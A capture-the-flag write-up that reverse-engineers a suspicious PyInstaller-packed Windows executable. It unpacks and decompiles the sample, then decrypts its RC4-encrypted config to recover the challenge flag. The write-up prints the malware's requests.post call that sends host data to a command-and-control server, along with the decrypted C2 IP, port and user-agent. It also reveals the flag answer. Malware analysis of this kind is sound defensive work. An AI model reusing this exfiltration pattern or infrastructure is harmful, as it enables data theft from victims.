NoBrackets 2025 | Reverse | Medium

A suspicious file

Your incident-response colleague has found a suspicious executable. They hand you the task of analyzing it.

bowie41

#reverse #pyinstaller #crypto

For this challenge, we are given nothing but an executable file.

Analysis

Before anything else, it is always a good idea to run the following command to get a first idea of what we are dealing with:

$ file ./explorer.exe
./explorer.exe: PE32+ executable (console) x86-64, for MS Windows, 7 sections

Note: I don't run checksec here because, a priori, we won't need to exploit the binary.

So this is a 64-bit (x86-64) Windows executable in PE32+ format.
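If file isn't at hand, the same information can be read straight from the PE headers. Here is a minimal sketch of that check; the function name describe_pe and the synthetic header are mine, and the buffer is just enough bytes to exercise the parser, not a real executable.

```python
import struct

def describe_pe(data: bytes) -> str:
    """Return a short description of a PE image based on its headers."""
    if data[:2] != b"MZ":
        return "not a PE file (missing MZ signature)"
    # e_lfanew, at offset 0x3C of the DOS header, points to the PE signature.
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_offset:pe_offset + 4] != b"PE\0\0":
        return "not a PE file (missing PE signature)"
    # COFF header right after the signature: Machine, NumberOfSections.
    machine, sections = struct.unpack_from("<HH", data, pe_offset + 4)
    # The optional header follows the 20-byte COFF header; it starts with Magic.
    (magic,) = struct.unpack_from("<H", data, pe_offset + 24)
    kind = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "unknown")
    arch = {0x8664: "x86-64", 0x14C: "x86"}.get(machine, hex(machine))
    return f"{kind} executable, {arch}, {sections} sections"

# Synthetic header mimicking what `file` reported (hypothetical bytes).
fake = bytearray(0x100)
fake[0:2] = b"MZ"
struct.pack_into("<I", fake, 0x3C, 0x80)
fake[0x80:0x84] = b"PE\0\0"
struct.pack_into("<HH", fake, 0x84, 0x8664, 7)
struct.pack_into("<H", fake, 0x98, 0x20B)
print(describe_pe(bytes(fake)))  # PE32+ executable, x86-64, 7 sections
```

On the real sample, this would be called as describe_pe(open("explorer.exe", "rb").read()).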

First method

Without wasting any more time, we load the executable into a reverse-engineering tool. I use Ghidra here, but IDA, Binary Ninja or others should work just as well.

Once Ghidra has finished analyzing the file, it directly identifies the entry function, which is the first function executed:

void entry(void)

{
  FUN_14000d190();
  FUN_14000cdac();
  return;
}

So the program appears to run FUN_14000d190 and then FUN_14000cdac. Let's see what the first function does:

void FUN_14000d190(void)

{
  DWORD DVar1;
  _FILETIME local_res8;
  LARGE_INTEGER local_res10;
  _FILETIME local_18 [2];
  
  if (DAT_140043040 == 0x2b992ddfa232) {
    local_res8.dwLowDateTime = 0;
    local_res8.dwHighDateTime = 0;
    GetSystemTimeAsFileTime(&local_res8);
    local_18[0] = local_res8;
    DVar1 = GetCurrentThreadId();
    local_18[0] = (_FILETIME)((ulonglong)local_18[0] ^ (ulonglong)DVar1);
    DVar1 = GetCurrentProcessId();
    local_18[0] = (_FILETIME)((ulonglong)local_18[0] ^ (ulonglong)DVar1);
    QueryPerformanceCounter(&local_res10);
    DAT_140043040 =
         ((ulonglong)local_res10.s.LowPart << 0x20 ^
          CONCAT44(local_res10.s.HighPart,local_res10.s.LowPart) ^ (ulonglong)local_18[0] ^
         (ulonglong)local_18) & 0xffffffffffff;
    if (DAT_140043040 == 0x2b992ddfa232) {
      DAT_140043040 = 0x2b992ddfa233;
    }
  }
  DAT_140043080 = ~DAT_140043040;
  return;
}

After a bit of thought, we realize that this function just generates a pseudo-random number from:

The time -> GetSystemTimeAsFileTime
The thread ID -> GetCurrentThreadId
The process ID -> GetCurrentProcessId
The performance counter -> QueryPerformanceCounter

It then XORs these values together (along with the address of a stack variable) and keeps the low 48 bits.

Finally, it stores the result in DAT_140043040 and its bitwise complement (the ~ operator, so one's complement rather than two's complement) in DAT_140043080:

DAT_140043040 =
         ((ulonglong)local_res10.s.LowPart << 0x20 ^
          CONCAT44(local_res10.s.HighPart,local_res10.s.LowPart) ^ (ulonglong)local_18[0] ^
         (ulonglong)local_18) & 0xffffffffffff;

DAT_140043080 = ~DAT_140043040;
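To make the XOR mixing a bit less mysterious, here is a rough Python model of what the decompiled function computes. The function name init_cookie and all the input values are made up for illustration; on Windows they would come from the four API calls and from the address of a stack variable.

```python
MASK48 = 0xFFFFFFFFFFFF
MASK64 = 0xFFFFFFFFFFFFFFFF
DEFAULT_VALUE = 0x2B992DDFA232  # constant compared against in the decompilation

def init_cookie(filetime, thread_id, process_id, perf_counter, stack_addr):
    """Model of FUN_14000d190: XOR the entropy sources, keep 48 bits."""
    low = perf_counter & 0xFFFFFFFF
    value = filetime ^ thread_id ^ process_id
    value ^= ((low << 32) & MASK64) ^ perf_counter ^ stack_addr
    value &= MASK48
    # If the result happens to equal the default constant, nudge it by one.
    if value == DEFAULT_VALUE:
        value = DEFAULT_VALUE + 1
    # Second global: bitwise NOT of the first, on 64 bits.
    return value, ~value & MASK64

# Hypothetical inputs, only to show the shape of the result.
cookie, complement = init_cookie(
    filetime=0x01DB8A5C12345678,
    thread_id=4242,
    process_id=1337,
    perf_counter=0x0000001234ABCDEF,
    stack_addr=0x000000D3F7AFF8A8,
)
print(hex(cookie), hex(complement))
```

Whatever the inputs, the first value fits in 48 bits and the second one is its exact bit-for-bit inverse, which is all the function guarantees.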

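So there is nothing interesting in this function: 0x2b992ddfa232 is the default value of the MSVC stack security cookie, so this is most likely the runtime's __security_init_cookie routine rather than challenge code. Next, let's look at FUN_14000cdac: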

ulonglong FUN_14000cdac(void)

{
  code *pcVar1;
  bool bVar2;
  bool bVar3;
  uint uVar4;
  undefined8 uVar5;
  undefined8 uVar6;
  longlong *plVar7;
  ulonglong uVar8;
  ulonglong *puVar9;
  undefined8 *puVar10;
  undefined4 *puVar11;
  undefined8 unaff_RBX;
  undefined8 in_R9;
  
  uVar4 = (uint)unaff_RBX;
  uVar5 = FUN_14000cf8c(1);
  if ((char)uVar5 == '\0') {
    FUN_14000d2b0(7);
  }
  else {
    bVar2 = false;
    uVar5 = __scrt_acquire_startup_lock();
    uVar4 = (uint)CONCAT71((int7)((ulonglong)unaff_RBX >> 8),(char)uVar5);
    if (DAT_140047330 != 1) {
      if (DAT_140047330 == 0) {
        DAT_140047330 = 1;
        uVar6 = FUN_14001beb0((undefined8 *)&DAT_14002f468,(undefined8 *)&DAT_14002f4a8);
        if ((int)uVar6 != 0) {
          return 0xff;
        }
        FUN_14001be78((undefined8 *)&DAT_14002f450,(undefined8 *)&DAT_14002f460);
        DAT_140047330 = 2;
      }
      else {
        bVar2 = true;
      }
      __scrt_release_startup_lock((char)uVar5);
      plVar7 = (longlong *)FUN_14000d294();
      if ((*plVar7 != 0) && (uVar8 = FUN_14000d054((longlong)plVar7), (char)uVar8 != '\0')) {
        (*(code *)*plVar7)(0,2);
      }
      puVar9 = (ulonglong *)FUN_14000d29c();
      if ((*puVar9 != 0) && (uVar8 = FUN_14000d054((longlong)puVar9), (char)uVar8 != '\0')) {
        FUN_14001c190(*puVar9);
      }
      uVar6 = FUN_14001be20();
      puVar10 = FUN_14001c360();
      uVar5 = *puVar10;
      puVar11 = (undefined4 *)FUN_14001c358();
      uVar4 = FUN_140001000(*puVar11,uVar5,uVar6,in_R9);
      bVar3 = FUN_14000d404();
      if (bVar3) {
        if (!bVar2) {
          FUN_14001c174();
        }
        __scrt_uninitialize_crt(true,'\0');
        return (ulonglong)uVar4;
      }
      goto LAB_14000cf18;
    }
  }
  FUN_14000d2b0(7);
LAB_14000cf18:
  FUN_14001c1cc(uVar4);
  FUN_14001c184(uVar4);
  pcVar1 = (code *)swi(3);
  uVar8 = (*pcVar1)();
  return uVar8;
}

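Whoa. Lots of calls to lots of functions. The __scrt_* names suggest that this is still C runtime startup code, and that FUN_140001000, which receives what look like argc, argv and envp, is probably main.

Looking through the various functions being called, we come across:

FUN_140001000, which calls FUN_140003f80: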

void FUN_140003f80(wchar_t **param_1,undefined8 param_2,undefined8 param_3,undefined8 param_4)

{

  /* VERY LONG FUNCTION (elided) */

}

I won't even try to understand what this function does, but it repeatedly uses strings that refer to PYI:

eVar5 = FUN_140008e40("_PYI_APPLICATION_HOME_DIR",(LPCSTR)ppwVar16);
ppwVar13 = (wchar_t **)FUN_140008d30("_PYI_APPLICATION_HOME_DIR");
pcVar8 = "_PYI_APPLICATION_HOME_DIR environment variable is not defined!\n";

And it turns out that PYI refers to PyInstaller, a tool that bundles a Python script and its interpreter into a standalone executable.

Note: this is how I actually solved the challenge, but while writing this write-up I realized I could have used a much less haphazard method.

Second method

Before analyzing an executable, it is always worth running the strings command to see which character strings it contains:

$ strings ./explorer.exe | grep PYI  # I use grep here because the output would be huge otherwise;
                                     # the point is just to show that PYI shows up
[PYI-%d:%s]
[PYI-%d:ERROR]
Absolute path to script exceeds PYI_PATH_MAX
PYINSTALLER_SUPPRESS_SPLASH_SCREEN
PYINSTALLER_RESET_ENVIRONMENT
_PYI_ARCHIVE_FILE
_PYI_APPLICATION_HOME_DIR
_PYI_PARENT_PROCESS_LEVEL
_PYI_SPLASH_IPC
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s
Failed to set _PYI_PARENT_PROCESS_LEVEL environment variable!
PYINSTALLER_STRICT_UNPACK_MODE
_PYI_APPLICATION_HOME_DIR environment variable is not defined!
Path exceeds PYI_PATH_MAX limit.

Finding occurrences of the string "PYI" tells us just as well that the file was generated by PyInstaller.
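On a machine without strings and grep (a Windows analysis VM, for instance), the same check is only a few lines of Python. This is a simplified sketch: ascii_strings and pyinstaller_markers are names I made up, and the sample bytes are synthetic.

```python
import re

def ascii_strings(data: bytes, min_len: int = 4):
    """Yield runs of printable ASCII, roughly what `strings` prints."""
    for match in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        yield match.group().decode("ascii")

def pyinstaller_markers(data: bytes):
    """Keep only the strings that mention PYI, like `grep PYI`."""
    return [s for s in ascii_strings(data) if "PYI" in s]

# Synthetic bytes standing in for the executable's contents.
sample = (
    b"\x00\x01_PYI_ARCHIVE_FILE\x00junk\x00"
    b"\xffPath exceeds PYI_PATH_MAX limit.\x00abc"
)
print(pyinstaller_markers(sample))
# ['_PYI_ARCHIVE_FILE', 'Path exceeds PYI_PATH_MAX limit.']
```

On the real file, the input would be open("explorer.exe", "rb").read() instead of the sample.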

Decompilation

Once we know the executable was generated by PyInstaller, it is easy to find a tool to unpack it: pyinstxtractor

$ python3 pyinstxtractor.py ./explorer.exe
[+] Processing ./explorer.exe
[+] Pyinstaller version: 2.1+
[+] Python version: 3.8
[+] Length of package: 8941181 bytes
[+] Found 133 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_setuptools.pyc
[+] Possible entry point: pyi_rth_pkgutil.pyc
[+] Possible entry point: pyi_rth_multiprocessing.pyc
[+] Possible entry point: pyi_rth_pkgres.pyc
[+] Possible entry point: pyi_rth_inspect.pyc
[+] Possible entry point: explorer.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python 3.8 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: ./explorer.exe

You can now use a python decompiler on the pyc files within the extracted directory
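For the curious, the version and package length printed above come from a small trailer ("cookie") that PyInstaller places near the end of the executable. The sketch below shows how such a trailer can be located and decoded. The struct layout is my understanding of the PyInstaller 2.1+ format and should be treated as an assumption, and the library name python38.dll in the demo is a guess, not something read from the sample.

```python
import struct

# Magic bytes marking the CArchive cookie.
MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Assumed cookie layout: magic, package length, TOC offset, TOC length,
# Python version, Python library name (all big-endian).
COOKIE_FORMAT = "!8sIIii64s"

def read_cookie(data: bytes):
    """Locate the last cookie in the file and decode a few of its fields."""
    pos = data.rfind(MAGIC)
    if pos == -1:
        return None
    _, pkg_len, _toc_off, _toc_len, pyver, pylib = struct.unpack_from(
        COOKIE_FORMAT, data, pos
    )
    # The version is stored as e.g. 38 for 3.8, or 310 for 3.10.
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)
    return {
        "package_length": pkg_len,
        "python": f"{major}.{minor}",
        "library": pylib.rstrip(b"\0").decode(),
    }

# Synthetic trailer: length and version taken from the tool output above,
# TOC fields left at 0, library name hypothetical.
fake = b"...stub..." + struct.pack(
    COOKIE_FORMAT, MAGIC, 8941181, 0, 0, 38, b"python38.dll"
)
print(read_cookie(fake))
# {'package_length': 8941181, 'python': '3.8', 'library': 'python38.dll'}
```

pyinstxtractor does much more than this (it walks the table of contents and writes each entry to disk), so this is only meant to show where the first lines of its output come from.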

We can see that pyinstxtractor created an explorer.exe_extracted directory with lots of files in it:

$ ls ./explorer.exe_extracted/
Crypto                                    api-ms-win-core-localization-l1-2-0.dll        api-ms-win-crt-utility-l1-1-0.dll
PYZ.pyz                                   api-ms-win-core-memory-l1-1-0.dll              base_library.zip

(...)

api-ms-win-core-interlocked-l1-1-0.dll    api-ms-win-crt-string-l1-1-0.dll               ucrtbase.dll
api-ms-win-core-libraryloader-l1-1-0.dll  api-ms-win-crt-time-l1-1-0.dll                 unicodedata.pyd

The only file we care about is the one named after the original executable with the .pyc extension, here "explorer.pyc":

$ file ./explorer.exe_extracted/explorer.pyc
./explorer.exe_extracted/explorer.pyc: Byte-compiled Python module for CPython 3.8, timestamp-based, .py timestamp: Thu Jan  1 00:00:00 1970 UTC, .py size: 0 bytes
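What file reports here is simply the 16-byte header of the .pyc. A small sketch of how to read it yourself follows; parse_pyc_header is a name I made up, and the demo header is built by hand to mirror the output above (magic 3413 is CPython 3.8, timestamp 0, source size 0).

```python
import struct

def parse_pyc_header(data: bytes):
    """Decode the 16-byte header used by CPython 3.7+ .pyc files."""
    magic, crlf, flags, field1, field2 = struct.unpack_from("<H2sIII", data, 0)
    if crlf != b"\r\n":
        raise ValueError("not a .pyc file")
    if flags & 1:
        # Hash-based pyc: the last 8 bytes are a hash of the source.
        return {"magic": magic, "hash_based": True}
    # Timestamp-based pyc: source mtime, then source size.
    return {"magic": magic, "hash_based": False,
            "mtime": field1, "source_size": field2}

# Hand-built header mirroring the `file` output for explorer.pyc.
header = struct.pack("<H2sIII", 3413, b"\r\n", 0, 0, 0)
print(parse_pyc_header(header))
# {'magic': 3413, 'hash_based': False, 'mtime': 0, 'source_size': 0}
```

The magic number is what decompilers use to pick the right bytecode version, which is why a stripped or wrong header is a common cause of decompilation failures.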

It is a compiled Python file (PYC). From there, it is easy to decompile. Several tools exist for this, such as:

pycdc
uncompyle6
decompyle3
And surely plenty of others...

I use pycdc here:

$ pycdc ./explorer.exe_extracted/explorer.pyc -o ./explorer.py  # -o sets the output file,
                                                                # here ./explorer.py
Warning: block stack is not empty!
Unsupported opcode: BEGIN_FINALLY (97)
Unsupported opcode: BEGIN_FINALLY (97)
Unsupported opcode: BEGIN_FINALLY (97)
Unsupported opcode: BEGIN_FINALLY (97)
Warning: block stack is not empty!

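We get a few warnings but no errors, and our explorer.py file is indeed created. The unsupported BEGIN_FINALLY opcodes mean that some try/finally blocks may be incomplete in the output, which doesn't matter for what we are looking for.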
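If the decompiler had choked completely, a fallback would be to load the code object with marshal and look at its constants directly. Here is a sketch of that idea, with caveats: marshal only understands bytecode from the interpreter that is running, so on the real explorer.pyc this would have to run under Python 3.8. The helper names are mine, and the demo uses a tiny stand-in module compiled on the spot.

```python
import importlib.util
import marshal
import types

def load_code(pyc_bytes: bytes):
    """Return the module code object stored after the 16-byte header."""
    if pyc_bytes[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("pyc was built by a different Python version")
    return marshal.loads(pyc_bytes[16:])

def iter_code_objects(code):
    """Walk a code object and every function or class body nested in it."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from iter_code_objects(const)

def find_string_constants(code, needle: str):
    """List (function name, string) pairs whose string contains needle."""
    return [
        (obj.co_name, const)
        for obj in iter_code_objects(code)
        for const in obj.co_consts
        if isinstance(const, str) and needle in const
    ]

# Stand-in module compiled locally (not the real malware).
source = "c = None\ndef send():\n    return c['flag']\n"
pyc = (importlib.util.MAGIC_NUMBER + bytes(12)
       + marshal.dumps(compile(source, "demo.py", "exec")))
print(find_string_constants(load_code(pyc), "flag"))  # [('send', 'flag')]
```

From there, dis.dis() on the interesting code object gives a readable listing even when no decompiler supports the bytecode.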

The code is a bit long, but searching for "flag" in it leads us to:

r = requests.post(f'''http://{c['ip']}:{c['port']}''', {
        'id': str(i),
        'vs': v,
        'os': o,
        'f': c['flag'],
        'data': d }, {
        'User-Agent': c['user-agent'] }, **('data', 'headers'))

So the script sends a POST request, and in that request we find the expression

'f': c['flag']

which suggests that the dictionary c has a flag key. In other words, the flag is stored in this dictionary.
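A side note on the odd **('data', 'headers') at the end of the decompiled call: as far as I can tell, this is how pycdc renders keyword arguments for this bytecode version, so the original was most likely requests.post(url, data=..., headers=...). The sketch below rebuilds those arguments without sending anything. The function name and every value in the demo config are hypothetical.

```python
def build_post_arguments(c, i, v, o, d):
    """Rebuild the arguments of the decompiled requests.post call.

    Nothing is sent here: the result would be passed on as
    requests.post(args["url"], data=args["data"], headers=args["headers"]).
    """
    return {
        "url": f"http://{c['ip']}:{c['port']}",
        "data": {"id": str(i), "vs": v, "os": o, "f": c["flag"], "data": d},
        "headers": {"User-Agent": c["user-agent"]},
    }

# Placeholder configuration (documentation IP range, dummy flag).
demo_config = {
    "ip": "192.0.2.10",
    "port": 8080,
    "user-agent": "demo-agent",
    "flag": "PLACEHOLDER",
}
args = build_post_arguments(demo_config, i=1, v="v", o="os", d="payload")
print(args["url"])        # http://192.0.2.10:8080
print(args["data"]["f"])  # PLACEHOLDER
```

Read this way, the flag is simply one of the form fields the malware sends to its server with every request.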

So we look for where and how it is defined:

c = None   # defined at the top of the program

def mmm():
    global c
    encrypted_bytes = base64.b64decode(__)
    cipher = ARC4.new(____.encode())
    decrypted_bytes = cipher.decrypt(encrypted_bytes)
    c = json.loads(decrypted_bytes.decode())

To build c, the script base64-decodes __, decrypts the result with RC4 (ARC4) using ____ as the key, and parses the plaintext as JSON. Both variables are defined further up:

__ = 'e7sNFfPHrs/XuTYgCLZ0mrpo2gqI+dd/3+VzO+ySng/8Na (...) TncRaGl2bTrn0N'
____ = '4b69742f3533372e333620284b48544d4c2c206c696b652047'

Note: the (...) indicates that the value is very long and has been truncated here.
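One detail about the key is easy to miss: ____ looks like hex, and it does decode to readable text, but mmm() calls ____.encode(), so the RC4 key is the 50-character hex string itself and not the 25 bytes it represents. A quick check (the variable name key_text is mine):

```python
key_text = '4b69742f3533372e333620284b48544d4c2c206c696b652047'

# What the hex decodes to: a chunk of a browser User-Agent string.
print(bytes.fromhex(key_text))   # b'Kit/537.36 (KHTML, like G'

# What the script actually uses as the key: the ASCII hex characters.
key = key_text.encode()
print(len(key))                  # 50
```

Decoding the hex first and using the result as the key would therefore give garbage instead of JSON.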

Once we have all that, all that's left is to copy it (along with the imports) and run it locally, here in a Python 3.10.0 sandbox, to see what c contains:

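def rc4(key, data):
    """The sandbox struggles with the Crypto module, so here is an RC4 function
    written by ChatGPT (it does the same thing as the original code)."""
    # Key-scheduling algorithm: shuffle the state array using the key.
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 255
        S[i], S[j] = S[j], S[i]
    # Keystream generation, XORed byte by byte with the data.
    i, j, out = 0, 0, bytearray(len(data))
    for n, byte in enumerate(data):
        i = (i + 1) & 255
        j = (j + S[i]) & 255
        S[i], S[j] = S[j], S[i]
        out[n] = byte ^ S[(S[i] + S[j]) & 255]
    return bytes(out)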

import json, base64

c = None
__ = 'e7sNFfPHrs/XuTYgCLZ0mrpo2gqI+dd/3+VzO+ySng/8NaTD+Z4pMV6B39Qj9IgZElG7GcRpfEZD4sUoxhyQNAM4chxVCGW4tVDpV8Px7AAH8ZXKTmHsNW3W2zn9Dazw8AtiHKVkINfUHnUbR15aw9EnK4tqKy5Igl0XEKIWyvnwms0hu8XqaiWrJphgmt5CT1BtJJv/id46LqGJBZ7UhV6FesdzKGMkzihtCA1Pp17SPd7GRukwFB/Tyq5huiHAyoKF6Ld3/DJ9+JTD1u/CobI8xiWosSPZBEksqSub83XfzxjvTKqsJwKFJ0iCfIMXPmsXFhDZi79pdGTncRaGl2bTrn0N'
____ = '4b69742f3533372e333620284b48544d4c2c206c696b652047'

encrypted_bytes = base64.b64decode(__)
decrypted_bytes = rc4(____.encode(), encrypted_bytes)
c = json.loads(decrypted_bytes.decode())

print(f"Dictionnaire c : {c}")
print(f"Flag : {c['flag']}")

Note: it is important to run only this part of the code and not the rest because, after all, this is malware :)
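Since the hand-written RC4 replaces a library call, it is worth a quick sanity check before trusting its output. The sketch below is my own readable RC4 (not the author's exact code), checked against the widely published test vector for key "Key" and plaintext "Plaintext".

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: encryption and decryption are the same operation."""
    # Key-scheduling algorithm.
    state, j = list(range(256)), 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) & 255
        state[i], state[j] = state[j], state[i]
    # Keystream generation, XORed with the input.
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 255
        j = (j + state[i]) & 255
        state[i], state[j] = state[j], state[i]
        out.append(byte ^ state[(state[i] + state[j]) & 255])
    return bytes(out)

# Published RC4 test vector.
ciphertext = rc4(b"Key", b"Plaintext")
print(ciphertext.hex())           # bbf316e8d940af0ad3
# Applying RC4 again with the same key gives the plaintext back.
print(rc4(b"Key", ciphertext))    # b'Plaintext'
```

If an implementation passes this check, it should behave like ARC4.new(key).decrypt(data) on the challenge data as well.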

If we really want to stay faithful to the original script, we just run this Python code (it needs the pycryptodome package, which provides Crypto.Cipher.ARC4):

import base64, json
from Crypto.Cipher import ARC4

__ = 'e7sNFfPHrs/XuTYgCLZ0mrpo2gqI+dd/3+VzO+ySng/8NaTD+Z4pMV6B39Qj9IgZElG7GcRpfEZD4sUoxhyQNAM4chxVCGW4tVDpV8Px7AAH8ZXKTmHsNW3W2zn9Dazw8AtiHKVkINfUHnUbR15aw9EnK4tqKy5Igl0XEKIWyvnwms0hu8XqaiWrJphgmt5CT1BtJJv/id46LqGJBZ7UhV6FesdzKGMkzihtCA1Pp17SPd7GRukwFB/Tyq5huiHAyoKF6Ld3/DJ9+JTD1u/CobI8xiWosSPZBEksqSub83XfzxjvTKqsJwKFJ0iCfIMXPmsXFhDZi79pdGTncRaGl2bTrn0N'
____ = '4b69742f3533372e333620284b48544d4c2c206c696b652047'

encrypted_bytes = base64.b64decode(__)
cipher = ARC4.new(____.encode())
decrypted_bytes = cipher.decrypt(encrypted_bytes)
c = json.loads(decrypted_bytes.decode())

print(f"Dictionnaire c : {c}")
print(f"Flag : {c['flag']}")

$ python3 exploit.py
Dictionnaire c : {'ip': '163.172.72.190', 'port': 4569, 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3', 'flag': 'NBCTF{this_file_seems_suspicious}', 'dwd_folder': '%appdata%/local/temp/dadq58aef4/'}
Flag : NBCTF{this_file_seems_suspicious}

Honestly, I lost a lot of time in Ghidra while solving this challenge, but otherwise it was pretty fun :3
